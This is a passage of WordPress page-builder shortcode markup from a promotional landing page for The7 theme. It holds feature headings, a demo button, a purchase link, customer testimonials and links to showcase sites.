ult-adjust-bottom-margin ultimate-heading-33905830888d4de8b uvc-7597 color-title\">\n<div class=\"uvc-sub-heading ult-responsive\">to create a boutique-quality design\nin mere minutes</div>\n</div>\n[/ultimate_heading][ultimate_heading sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_margin=\"margin-top:30px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\"]Even a beginner can easily handle The7’s wast array of appearance customization options thanks to the Design Wizard feature.[/ultimate_heading][vc_single_image image=\"987\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480355917912{margin-right: -10% !important;margin-left: -10% !important;padding-top: 45px !important;padding-bottom: 10px !important;}\"][/vc_column][/vc_row][vc_row full_width=\"stretch_row\" equal_height=\"yes\" content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^411|url^https://gsw2023.com/wp-content/uploads/2016/11/bg-blur.jpg|caption^null|alt^null|title^bg-blur|description^null\" bg_image_repeat=\"no-repeat\" bg_override=\"ex-full\" type=\"vc_default\" css=\".vc_custom_1480115705454{background-color: #0f1217 !important;}\" el_id=\"main-demo\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-1\" css=\".vc_custom_1480117176787{padding-top: 70px !important;padding-bottom: 70px !important;}\"][vc_single_image image=\"1008\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480355970532{padding-bottom: 30px !important;}\"][ultimate_heading main_heading=\"The7 Main Demo\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]all theme’s features in one place[/ultimate_heading][ultimate_heading sub_heading_color=\"#90979e\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_margin=\"margin-top:30px;margin-bottom:30px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\"]An overview of post types, page templates, shortcodes and plugins neatly organized in one demo. Main demo also features numerous home and other pages concepts, Slider Revolution templates\nand more![/ultimate_heading][dt_default_button link=\"url:%2Fmain%2F||target:%20_blank|\" size=\"medium\" button_alignment=\"btn_center\" icon_type=\"picker\" icon_picker=\"icomoon-the7-font-the7-link-03\" icon_gap=\"12px\"]Launch main demo[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480355407138{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}\" offset=\"vc_hidden-sm vc_hidden-xs\"][vc_single_image image=\"1548\" img_size=\"full\" image_hovers=\"false\" lazy_loading=\"true\" el_class=\"layzr-bg-off\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1561541631124{padding-top: 70px !important;padding-bottom: 80px !important;}\" el_id=\"demos\"][vc_column][vc_single_image image=\"1005\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480356022878{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"Pre-Built Dummy Websites\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]easy to install and customize[/ultimate_heading][ultimate_heading sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_margin=\"margin-top:30px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\"]The7 comes with 50+ pre-made dummy websites complete with exclusive Slider Revolution and Visual Composer templates. They all can be imported in a few clicks, mixed and matched to become a solid foundation for your site.[/ultimate_heading][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" content_bg=\"n\" post_content_paddings=\"15px 0px 0px 0px\" resized_image_dimensions=\"750x500\" image_border_radius=\"5px\" image_decoration=\"shadow\" shadow_v_length=\"10px\" shadow_blur_radius=\"45px\" shadow_spread=\"1px\" shadow_color=\"rgba(30,37,54,0.24)\" image_scale_animation_on_hover=\"disabled\" image_hover_bg_color=\"solid_rollover_bg\" custom_rollover_bg_color=\"rgba(255,255,255,0.3)\" gap_between_posts=\"25px\" all_posts_the_same_width=\"y\" link_lead=\"follow_link\" post_title_font_style=\"normal:normal:none\" post_title_font_size=\"14px\" post_title_line_height=\"14px\" post_title_bottom_margin=\"0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" meta_info_bottom_margin=\"0px\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" show_zoom=\"n\" show_details=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" show_categories_filter=\"y\" gap_below_category_filter=\"45px\" allow_to_navigate_by_url=\"y\" category=\"\" css_dt_portfolio=\".vc_custom_1585210639400{padding-top: 35px !important;}\"][/vc_column][/vc_row][vc_row full_width=\"stretch_row\" bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^411|url^https://gsw2023.com/wp-content/uploads/2016/11/bg-blur.jpg|caption^null|alt^null|title^bg-blur|description^null\" bg_image_repeat=\"no-repeat\" bg_override=\"ex-full\" type=\"vc_default\" css=\".vc_custom_1480111988241{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}\"][vc_column][ultimate_heading main_heading=\"The7 is THE theme that will help you\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" main_heading_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\" sub_heading_style=\"font-weight:300;\" sub_heading_margin=\"margin-bottom:35px;\"]creating pro-grade sites without ever touching a code.[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fthemeforest.net%2Fitem%2Fthe7-responsive-multipurpose-wordpress-theme%2F5556590%3Fref%3DDream-Theme%26license%3Dregular%26open_purchase_for_item_id%3D5556590||target:%20_blank|\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"350\" button_alignment=\"btn_center\" icon_type=\"picker\" icon_picker=\"icomoon-the7-font-icon-cart-detailed\" icon_gap=\"14px\"]Create a website with The7[/dt_default_button][/vc_column][/vc_row][vc_row equal_height=\"yes\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" css=\".vc_custom_1480115720857{padding-top: 70px !important;padding-bottom: 30px !important;}\" bg_color_value=\"#ffffff\" el_id=\"features\"][vc_column css=\".vc_custom_1480110505228{padding-bottom: 65px !important;}\"][vc_single_image image=\"1006\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480356038558{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"Other Features\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]learn more about The7[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368847088{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"1558\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"Rock-Solid 5-Star Rating\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]through 150 000+ purchases[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368872679{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"1887\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"More Bang For Your Buck!\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]$100+ worth premium plugins included[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368883967{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"996\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"Multilingual &amp; Translation Ready\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]Already translated into 10+ languages[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368893600{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"990\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"The7 Elements\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]Extend your site with portfolio, photo galleries, team (and more!)[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368901612{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"1560\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"SEO-Ready &amp; Mobile Friendly\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"](certified by Google)[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368911187{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"991\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"Unlimited Headers\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]Infinite desktop &amp; mobile header\nlayout combinations[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368922883{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"995\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"First-Class Support\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]&amp; extensive documentation[/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368933650{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"998\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"100% WooCommerce Compatibility\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]Sell with style![/ultimate_heading][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1480368948510{padding-bottom: 70px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][dt_fancy_image image_id=\"1561\" width=\"300\" height=\"200\"][ultimate_heading main_heading=\"Regular Updates\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:30px;\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:28px;\" main_heading_margin=\"margin-top:10px;margin-bottom:5px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"]with new valuable features[/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"full\" type=\"vc_default\" bg_color_value=\"#f9f9fa\" css=\".vc_custom_1480111769324{padding-bottom: 50px !important;}\"][vc_column css=\".vc_custom_1480110789588{padding-top: 70px !important;padding-bottom: 80px !important;}\"][vc_single_image image=\"1003\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480356048334{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"Customers Love The7!\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]but don\'t just take our word for it[/ultimate_heading][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848824972{padding-bottom: 50px !important;}\"][ultimate_heading spacer=\"image_only\" spacer_img_width=\"39\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_style=\"font-weight:300;\" spacer_img=\"id^1010|url^https://gsw2023.com/wp-content/uploads/2016/11/comment-icon-tiny.png|caption^null|alt^null|title^comment-icon-tiny|description^null\" spacer_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\"]\n<div class=\"wpb_text_column wpb_content_element vc_custom_1446987300151 content_testimonials\">\n<div class=\"wpb_wrapper\">\n\nEasy to use and a myriad of options to customize your site. I’ve moved all my sites over to this theme. Thank you!\n\n</div>\n</div>\n[/ultimate_heading][ultimate_heading main_heading=\"stefaniephan\" sub_heading_color=\"#adb0b6\" spacer=\"image_only\" spacer_position=\"middle\" spacer_img_width=\"88\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:20px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_style=\"font-weight:normal;font-style:normal;\" spacer_img=\"id^1011|url^https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-icon-tiny.png|caption^null|alt^null|title^stars-rating-icon-tiny|description^null\" spacer_margin=\"margin-bottom:30px;\" main_heading_margin=\"margin-top:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\"][/ultimate_heading][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848350909{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"1536\" onclick=\"custom_link\" image_link=\"https://mouthes-le-bihan.fr\" custom_link_target=\"_blank\" width=\"750\" height=\"500\" border_radius=\"4px\" image_decoration=\"shadow\" shadow_h_length=\"0px\" shadow_v_length=\"10px\" shadow_blur_radius=\"45px\" shadow_spread=\"0px\" shadow_color=\"rgba(30,37,54,0.18)\"][ultimate_heading main_heading=\"French Winery &amp; Stables\" sub_heading_color=\"#adb0b6\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:23px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_margin=\"margin-top:25px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"][/ultimate_heading][ult_buttons btn_title=\"https://mouthes-le-bihan.fr\" btn_link=\"url:https%3A%2F%2Fmouthes-le-bihan.fr||target:%20_blank|\" btn_align=\"ubtn-center\" btn_size=\"ubtn-custom\" btn_title_color=\"#adb0b6\" btn_bg_color=\"\" btn_hover=\"ubtn-fade-bg\" btn_title_color_hover=\"#292e36\" icon_size=\"\" btn_icon_pos=\"ubtn-sep-icon-right-rev\" btn_line_height=\"desktop:20px;\" css_adv_btn=\".vc_custom_1539508919095{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\" btn_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" btn_font_size=\"desktop:14px;\" btn_font_style=\"font-weight:normal;font-style:normal;\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848750253{padding-bottom: 50px !important;}\"][ultimate_heading spacer=\"image_only\" spacer_img_width=\"39\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_style=\"font-weight:300;\" spacer_img=\"id^1010|url^https://gsw2023.com/wp-content/uploads/2016/11/comment-icon-tiny.png|caption^null|alt^null|title^comment-icon-tiny|description^null\" spacer_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\"]Fantastic theme! Highly customisable, looks great on all devices and absolutely fantastic support. I will not hesitate to buy this theme again. I have already bough it 3 times![/ultimate_heading][ultimate_heading main_heading=\"Seventy7_web\" sub_heading_color=\"#adb0b6\" spacer=\"image_only\" spacer_position=\"middle\" spacer_img_width=\"88\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:20px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_style=\"font-weight:normal;font-style:normal;\" spacer_img=\"id^1011|url^https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-icon-tiny.png|caption^null|alt^null|title^stars-rating-icon-tiny|description^null\" spacer_margin=\"margin-bottom:30px;\" main_heading_margin=\"margin-top:15px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto\"][/ultimate_heading][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848278606{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"1414\" onclick=\"custom_link\" image_link=\"https://puravidabio.sk\" custom_link_target=\"_blank\" width=\"750\" height=\"500\" border_radius=\"4px\" image_decoration=\"shadow\" shadow_h_length=\"0px\" shadow_v_length=\"10px\" shadow_blur_radius=\"45px\" shadow_spread=\"0px\" shadow_color=\"rgba(30,37,54,0.18)\"][ultimate_heading main_heading=\"Organic Cosmetics Store\" sub_heading_color=\"#adb0b6\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:23px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_margin=\"margin-top:25px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"][/ultimate_heading][ult_buttons btn_title=\"https://puravidabio.sk\" btn_link=\"url:https%3A%2F%2Fpuravidabio.sk||target:%20_blank|\" btn_align=\"ubtn-center\" btn_size=\"ubtn-custom\" btn_title_color=\"#adb0b6\" btn_bg_color=\"\" btn_hover=\"ubtn-fade-bg\" btn_title_color_hover=\"#292e36\" icon_size=\"\" btn_icon_pos=\"ubtn-sep-icon-right-rev\" btn_line_height=\"desktop:20px;\" css_adv_btn=\".vc_custom_1517499120387{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\" btn_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" btn_font_size=\"desktop:14px;\" btn_font_style=\"font-weight:normal;font-style:normal;\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848765776{padding-bottom: 50px !important;}\"][ultimate_heading spacer=\"image_only\" spacer_img_width=\"39\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_style=\"font-weight:300;\" spacer_img=\"id^1010|url^https://gsw2023.com/wp-content/uploads/2016/11/comment-icon-tiny.png|caption^null|alt^null|title^comment-icon-tiny|description^null\" spacer_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\"]\n<div class=\"wpb_text_column wpb_content_element vc_custom_1447441157303 quote_decoration_landing\">\n<div class=\"wpb_wrapper\">\n\nSpectacular for mid skilled developers to get a robust site up and running quickly and looking professional.\n\n</div>\n</div>\n[/ultimate_heading][ultimate_heading main_heading=\"mhaas\" sub_heading_color=\"#adb0b6\" spacer=\"image_only\" spacer_position=\"middle\" spacer_img_width=\"88\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:20px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_style=\"font-weight:normal;font-style:normal;\" spacer_img=\"id^1011|url^https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-icon-tiny.png|caption^null|alt^null|title^stars-rating-icon-tiny|description^null\" spacer_margin=\"margin-bottom:30px;\" main_heading_margin=\"margin-top:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\"][/ultimate_heading][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848258953{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"1340\" onclick=\"custom_link\" image_link=\"https://yogaunioncwc.com\" custom_link_target=\"_blank\" width=\"750\" height=\"500\" border_radius=\"4px\" image_decoration=\"shadow\" shadow_h_length=\"0px\" shadow_v_length=\"10px\" shadow_blur_radius=\"45px\" shadow_spread=\"0px\" shadow_color=\"rgba(30,37,54,0.18)\"][ultimate_heading main_heading=\"Yoga Union\" sub_heading_color=\"#adb0b6\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:23px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_margin=\"margin-top:25px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"][/ultimate_heading][ult_buttons btn_title=\"https://yogaunioncwc.com\" btn_link=\"url:https%3A%2F%2Fyogaunioncwc.com||target:%20_blank|\" btn_align=\"ubtn-center\" btn_size=\"ubtn-custom\" btn_title_color=\"#adb0b6\" btn_bg_color=\"\" btn_hover=\"ubtn-fade-bg\" btn_title_color_hover=\"#292e36\" icon_size=\"\" btn_icon_pos=\"ubtn-sep-icon-right-rev\" btn_line_height=\"desktop:20px;\" css_adv_btn=\".vc_custom_1499092423420{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\" btn_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" btn_font_size=\"desktop:14px;\" btn_font_style=\"font-weight:normal;font-style:normal;\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479848812325{padding-bottom: 50px !important;}\"][ultimate_heading spacer=\"image_only\" spacer_img_width=\"39\" sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_style=\"font-weight:300;\" spacer_img=\"id^1010|url^https://gsw2023.com/wp-content/uploads/2016/11/comment-icon-tiny.png|caption^null|alt^null|title^comment-icon-tiny|description^null\" spacer_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\"]So amazingly awesome and easy to use. Limitless customization and one of the best user interfaces ever. If you can dream it, this theme can make it come to life.[/ultimate_heading][ultimate_heading main_heading=\"Vercoquin\" sub_heading_color=\"#adb0b6\" spacer=\"image_only\" spacer_position=\"middle\" spacer_img_width=\"88\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:20px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_style=\"font-weight:normal;font-style:normal;\" spacer_img=\"id^1011|url^https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-icon-tiny.png|caption^null|alt^null|title^stars-rating-icon-tiny|description^null\" spacer_margin=\"margin-bottom:30px;\" main_heading_margin=\"margin-top:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\"][/ultimate_heading][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479847609345{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"1591\" onclick=\"custom_link\" image_link=\"https://klickpiloten.de/\" custom_link_target=\"_blank\" width=\"750\" height=\"500\" border_radius=\"4px\" image_decoration=\"shadow\" shadow_h_length=\"0px\" shadow_v_length=\"10px\" shadow_blur_radius=\"45px\" shadow_spread=\"0px\" shadow_color=\"rgba(30,37,54,0.18)\"][ultimate_heading main_heading=\"Online-Marketing Agency\" sub_heading_color=\"#adb0b6\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:23px;\" main_heading_font_size=\"desktop:18px;\" main_heading_line_height=\"desktop:24px;\" main_heading_margin=\"margin-top:25px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" main_heading_style=\"font-weight:normal;font-style:normal;\"][/ultimate_heading][ult_buttons btn_title=\"https://klickpiloten.de\" btn_link=\"url:https%3A%2F%2Fklickpiloten.de%2F||target:%20_blank|\" btn_align=\"ubtn-center\" btn_size=\"ubtn-custom\" btn_title_color=\"#adb0b6\" btn_bg_color=\"\" btn_hover=\"ubtn-fade-bg\" btn_title_color_hover=\"#292e36\" icon_size=\"\" btn_icon_pos=\"ubtn-sep-icon-right-rev\" btn_line_height=\"desktop:20px;\" css_adv_btn=\".vc_custom_1540303406262{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\" btn_font_family=\"font_family:Roboto|font_call:Roboto|variant:regular\" btn_font_size=\"desktop:14px;\" btn_font_style=\"font-weight:normal;font-style:normal;\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1479850103851{padding-bottom: 50px !important;}\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Want to learn more about customers\' experience with The7?\" sub_heading_color=\"#adb0b6\" sub_heading_font_size=\"desktop:14px;\" sub_heading_line_height=\"desktop:23px;\" 